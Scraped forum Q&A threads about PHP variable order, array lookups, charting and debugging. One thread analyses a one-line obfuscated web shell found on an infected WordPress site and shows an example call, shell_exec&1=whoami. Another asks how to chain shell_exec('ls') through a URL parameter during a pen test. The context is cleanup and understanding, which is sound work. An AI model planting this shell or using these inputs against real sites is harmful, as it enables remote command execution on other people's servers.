I have the following variables in my php test script :
$url="http://example.com";
$uri="/index.php";
$url="$url$uri";
echo $url;
This returns the values of 2 variables $url and $uri, and the result i get is :
http://example.com/index.php
My question is : if php processes variables from top to bottom then ,why does "echo $url" not display the value of first variable "http://example.com" ?
And in this situation how will I be able to echo the value of first variable? Do I need to move the first variable from top to middle? :
$uri="/index.php";
$url="$url$uri";
$url="http://example.com";
echo $url;
Any ideas?
Is order of variables important in php?
Order of statements is. PHP does things in the order you tell it to do them.
if php processes variables from top to bottom then ,why does "echo $url" not display the value of first variable
It does. It's just that that variable no longer has the value you gave it on line 1 because you gave it a new value on line 3.
And in this situation how will I be able to echo the value of first variable?
There are lots of approaches to that and …
Do I need to move the first variable from top to middle?
… would do it, but makes the line $url="$url$uri"; entirely pointless.
You need to step back and think about what you actually want to achieve.
If you need to keep the URL to the site root around and have the combined URL available somewhere, then maybe introducing a third variable name is the way forward.
If you are just debugging and want to make sure the value of $url is right before you change it, then you should probably move your echo statement instead.
Related
Tha following is working in index.php, but is it correct?
Before the html tag:
$la= array();
$la['index.php'] = 'Start page';
(Actually this is another language library that is included)
Then inside the header:
<title><?php echo $la[$_SERVER['PHP_SELF']];?></title>
For me the part "$la[$_SERVER['PHP_SELF']]" seams strange, but its working. The title is there in my browser. Is it good practice?
Yes, current code works. If it's good practice is up for debate.
PHP (like many other language) will evaluate the statements in order.
Everytime you use the brackets you are really using the arrays index operator where the index acts as the parameter.
Your code will first evaluate the $_SERVER['PHP_SELF'] statement which probably returns 'index.php'. The next call will be $la['index.php'] (since that was what your inner statement returned. This will in turn return the value 'Start page' which is what is sent to the echo.
There's nothing wrong with your code. The superglobal $_SERVER['PHP_SELF'] holds the name of the current file. It's not very secure because it can be manipulated to execute arbitrary code if you inject it without sanitizing it properly.
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
I have the following code:
<?php
if(isset($_GET['function'])){
$_GET['function']();
}
?>
So if i entered this url:
http://localhost/?function=phpinfo
I will see the phpinfo function output on the screen.
can i have a way to concatenate 2 function in the url like this example:
http://localhost/?function=shell_exec('ls') AND phpinfo
So i want to see the first function output..
If you may asking why i need this, is because i am pen testing an web application with this situation..
Thanks for the help..
With your given code example it is not possible to do what you want. All your functions, so shellexec('ls') and phpinfo will be interpreted as one string, which is then called as a function in by calling it with added parenthis.
The only way that I can think of is using a variable parameter list, rather than just a single parameter. Get all the GET parameters in the function, and loop through them, executing each one.
So i have the code below basically when its run it will display a graph. How can i make the variables inside the arrays work the variable works and when echoed will give a number but for some reason it doesn't input number there. $mar1 in [here]
$lineChart = new gLineChart($_GET['width'],$_GET['height']);
[here]$lineChart->addDataSet(array($mar1,315,66,40));[/here]
$lineChart->setLegend(array("first"));
$lineChart->setColors(array("ff3344", "11ff11", "22aacc", "3333aa"));
$lineChart->setVisibleAxes(array('x','y'));
$lineChart->setDataRange(30,400);
$lineChart->addAxisLabel(0, array("This", "axis", "has", "labels!"));
$lineChart->addAxisRange(1, 30, 400);
$lineChart->setGridLines(0, 15);
$lineChart->renderImage();
This is a very, very basic question about PHP syntax. Arrays can and frequently are used with variable data.
There isn't anything wrong with the syntax of the code that you posted, so chances are that this is a case of the $mar1 variable not being defined or not containing the data that you're expecting. You probably want to echo or var_dump this variable and see what's in it and work backwards from there.
If $mar1 doesn't contain what you expect, look in the code above that line and see if its value is being set. If this is being passed in the browser's query string like the $_GET['width'] and $_GET['height'] variables are, you would need to access it as $_GET['mar1'] instead of just $mar1.
If this file is being included from another file or includes/requires other files, it could also be defined in the including file(s).
If $mar1 does contain the value you're expecting, then check the documentation for the gLineChart class and make sure that you're passing it all the correct parameters.
I have an old application witch pops up an error at a certain location. The error is about an wrong set variable. Only from the error it is not possible to find the location where the variable is set wrong. Now my idea is to use reflections to find the location.
Is it possible to use reflections to find the code position at which a variable gets a certain value?
The idea: I have the name and the value of the variable. Now if both are matching a certain event should be triggered and echo the actual parsed file and line number.
Every ideas that help are appreciated.
Thank you,
-lony
P.S.: Is it possible even if the application is not really object oriented and uses a lot of spaghetti code?
I would be you do a debug_backtrace at the point where the error occurs and try to exploit the stack trace to see where the variable is changed. The debug_backtrace would give you a list of file included after it should be fairly easy to filter a list of line with a global search (i.e. grep)
var_dump(debug_backtrace())
if (variable == value) {
echo "variable equals value, line #whatever"+"<br/>";
}
Just place these at various points in code and see which ones display. Manually enter line numbers.
I found a solution to one of my problems.
The function debug_print_backtrace helped me finally debugging my spaghetti code. I found it by reading this post.
-Cheers